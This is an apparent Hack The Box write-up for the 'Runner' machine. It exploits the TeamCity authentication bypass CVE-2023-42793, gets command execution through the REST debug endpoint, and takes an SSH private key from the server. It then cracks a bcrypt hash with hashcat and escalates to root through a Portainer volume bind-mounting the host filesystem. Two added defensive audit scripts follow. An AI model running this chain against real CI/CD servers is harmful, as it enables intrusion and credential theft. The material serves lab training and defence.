# HTB - Runner

<figure><img src="/files/jio5dPGH6aHDGlr8carY" alt=""><figcaption></figcaption></figure>

## Enumeration

***

**Scope**

> IP address: 10.10.11.13

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip 

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```
* Open ports: 22 - 80 - 8000
* UDP open ports: None
* Services: ssh - http - http-alt
```

**CVE-2023-42793:**

{% embed url="<https://github.com/Zyad-Elsayed/CVE-2023-42793>" %}

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb 
   
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec]
```

## Initial Access

***

<figure><img src="/files/r13e5CT7oUtZSC8Li8Db" alt=""><figcaption></figcaption></figure>

To get RCE, I had to generate a token from the webapp to be able to use it in the exploit.

#### Token

```
eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0
```

#### Get RCE

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"

StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
```

I tried to search for files containing passwords, sensitive info or private keys and found one.

```bash
tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY-----
```

`/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa`

```bash
-----BEGIN OPENSSH PRIVATE KEY-----
..snip..
-----END OPENSSH PRIVATE KEY-----
```

I'll try to log in over SSH with one of the existing users and the private key.

<figure><img src="/files/RlykSGg8ZHUs1DdIiIG6" alt=""><figcaption></figcaption></figure>

Success :)

<figure><img src="/files/JUI5FysEalHU73QSzcUl" alt=""><figcaption></figcaption></figure>

```bash
john@runner:~$ cat user.txt 
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx
```

> User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx

***

## Privilege Escalation

```bash
john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.11.13:80          10.10.16.31:55852       ESTABLISHED -
tcp        0      0 127.0.0.1:8111          127.0.0.1:39674         TIME_WAIT   -       
```

I'll forward the internal ports with SSH local port forwarding.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa
```

We get a web app on port 9000:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000 
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT
```

`http://localhost:9000`

<figure><img src="/files/iamD9RNKAiIZ077DaVnR" alt=""><figcaption></figcaption></figure>

I knew I had missed something, so I went back to the web app and realised I had forgotten to create a backup and inspect its contents.

<figure><img src="/files/QCzsPtbXr9k5oAaUPlEE" alt=""><figcaption></figcaption></figure>

```bash
tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users

ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT
```

```
matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked
```
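The dump above stores passwords as bcrypt with cost factor `$07$`. As an added example (not part of the write-up), the following Python parses a `users` dump in the same column layout and reports accounts whose cost factor is below a chosen minimum (10 here, a common floor); the dump it runs on is constructed, with placeholder hashes rather than the real ones.

```python
"""Parse a TeamCity `users` dump like the one above and report accounts whose
bcrypt cost factor is below a minimum (10 here, a common floor; the dump above
uses cost 07, which makes offline guessing of weak passwords cheap). Added
example, not part of the write-up; the dump is constructed with the page's
column layout and placeholder hashes, not the real ones."""
import csv
import io
import re

# Modular-crypt form of bcrypt: $2a$<2-digit cost>$<22-char salt + 31-char hash>
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")
MIN_COST = 10

def bcrypt_cost(hash_str):
    """Return the cost factor of a bcrypt hash, or None if it is not well-formed."""
    m = BCRYPT_RE.match(hash_str)
    return int(m.group(1)) if m else None

def weak_accounts(dump_text, min_cost=MIN_COST):
    """Return (username, reason) for every account that fails the policy."""
    reader = csv.DictReader(io.StringIO(dump_text), skipinitialspace=True)
    findings = []
    for row in reader:
        user = row["USERNAME"]
        if row["ALGORITHM"] != "BCRYPT":
            findings.append((user, f"unexpected algorithm {row['ALGORITHM']}"))
            continue
        cost = bcrypt_cost(row["PASSWORD"])
        if cost is None:
            findings.append((user, "malformed bcrypt hash"))
        elif cost < min_cost:
            findings.append((user, f"bcrypt cost {cost} below {min_cost}"))
    return findings

# Constructed dump: placeholder hashes with cost 07 (as on the page) and cost 12.
WEAK = "$2a$07$" + "A" * 53
STRONG = "$2a$12$" + "B" * 53
SAMPLE_DUMP = f"""\
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, {WEAK}, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, {WEAK}, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
3, svc, {STRONG}, , "", 1720071358142, BCRYPT
"""

if __name__ == "__main__":
    for user, reason in weak_accounts(SAMPLE_DUMP):
        print(f"[!] {user}: {reason}")
```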

Log in to `http://localhost:9000` with these credentials.

<figure><img src="/files/cbJ7vZj6ftlz5g2kLYAh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/DxbAgCyaNmFBrheIUCMB" alt=""><figcaption></figcaption></figure>

This article is very useful for understanding the container setup, but it was based on an older version of Portainer:

{% embed url="<https://rioasmara.com/2021/08/15/use-portainer-for-privilege-escalation/>" %}

Following the post:

#### Get the image ID

<figure><img src="/files/6sCsEoEQzP2s05tmlmQW" alt=""><figcaption></figcaption></figure>

#### Map the host file system into the container with the following volume settings

```
device: /
o: bind
type: none
```

<figure><img src="/files/ese4BMHFmopuVz7nGm0Z" alt=""><figcaption></figcaption></figure>

#### Create a container with the settings below

<figure><img src="/files/laDLRjV57IVaZLKBimSU" alt=""><figcaption></figcaption></figure>

#### Finally, access the console and get root access :)

<figure><img src="/files/8wzo7auxGAiTDt7ncGTc" alt=""><figcaption></figcaption></figure>

> Root flag: e5072defc9d08b4320325b1e16a6b83f
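The escalation above works because the `device: /`, `o: bind`, `type: none` options turn an ordinary Docker `local` volume into a bind mount of the host root, which any container using the volume then receives. As an added example (not part of the write-up), the following Python audits `docker inspect` and `docker volume inspect` output for exactly that pattern, plus plain bind mounts of sensitive paths and privileged containers; the JSON it runs on is a constructed sample.

```python
"""Audit Docker for containers that receive the host filesystem, including the
route used above: a 'local' volume whose driver options are device=/, o=bind,
type=none. Such a volume appears in `docker inspect` as Type "volume", so a check
that only looks at Type "bind" misses it. Added example, not part of the write-up;
the JSON below is a constructed sample of `docker inspect`/`docker volume inspect`."""
import json

SENSITIVE = ("/", "/etc", "/root", "/home", "/var/run/docker.sock")

def is_sensitive(path):
    path = path.rstrip("/") or "/"
    return path == "/" or any(path == p or path.startswith(p + "/")
                              for p in SENSITIVE if p != "/")

def volume_host_path(vol):
    """Host path behind a 'local' volume that is really a bind mount, else None."""
    opts = vol.get("Options") or {}
    if opts.get("type") == "none" and "bind" in (opts.get("o") or "").split(","):
        return opts.get("device")
    return None

def audit(containers_json, volumes_json):
    """Return (container, reason) findings for privileged or host-mounting containers."""
    volumes = {v["Name"]: v for v in json.loads(volumes_json)}
    findings = []
    for c in json.loads(containers_json):
        name = c["Name"].lstrip("/")
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "privileged container"))
        for m in c.get("Mounts", []):
            src = m.get("Source", "")
            if m.get("Type") == "volume":  # resolve the volume's driver options
                src = volume_host_path(volumes.get(m.get("Name"), {})) or ""
            if src and is_sensitive(src):
                findings.append((name, f"host path {src} mounted at {m.get('Destination')}"))
    return findings

# Constructed samples: a normal TeamCity data volume and a volume bound to /.
CONTAINERS = json.dumps([
    {"Name": "/teamcity", "HostConfig": {"Privileged": False}, "Mounts": [
        {"Type": "volume", "Name": "tc_data", "Destination": "/data/teamcity_server/datadir"}]},
    {"Name": "/escalate", "HostConfig": {"Privileged": False}, "Mounts": [
        {"Type": "volume", "Name": "hostroot", "Destination": "/mnt/root"}]}])
VOLUMES = json.dumps([
    {"Name": "tc_data", "Driver": "local", "Options": None},
    {"Name": "hostroot", "Driver": "local", "Options": {"device": "/", "o": "bind", "type": "none"}}])

if __name__ == "__main__":
    for name, reason in audit(CONTAINERS, VOLUMES):
        print(f"[!] {name}: {reason}")
```

On a live host the same logic applies to the output of `docker inspect $(docker ps -q)` and `docker volume inspect $(docker volume ls -q)`.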
